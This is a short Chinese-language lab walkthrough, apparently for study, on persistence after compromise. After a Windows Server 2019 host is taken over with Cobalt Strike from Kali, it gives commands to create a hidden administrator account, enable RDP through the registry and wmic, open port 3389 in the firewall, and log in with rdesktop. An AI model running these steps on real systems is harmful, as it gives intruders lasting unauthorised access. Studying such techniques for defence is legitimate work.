0x01 获取window权限（管理员）

使用cs上线用户
kali:192.168.253.234
window server 2019: 192.168.253.243

0x02 添加用户，并且到管理员组

net user uname pass /add  添加用户名为name，密码为pass
net localgroup Administrators uname /add  将用户名为uname的用户添加到管理员组
net user uname /del 删除uname用户

添加用户，并且查看当前的用户

用户添加到管理员组，并且查看管理员组成员：

0x03 开启远程桌面

设置远程桌面的端口（默认开启3389）
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
开启远程桌面：（1代表开启，0代表关闭）
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
开启防火墙通过：
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

0x04 添加到远程桌面组

net localgroup "Remote Desktop Users" uname /add 将用户名为uname的用户添加到远程桌面组

0x05 进行远程

rdesktop IP地址
账号：admin123
密码：Admin@123

0x06 免责声明

本文档供学习，请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责！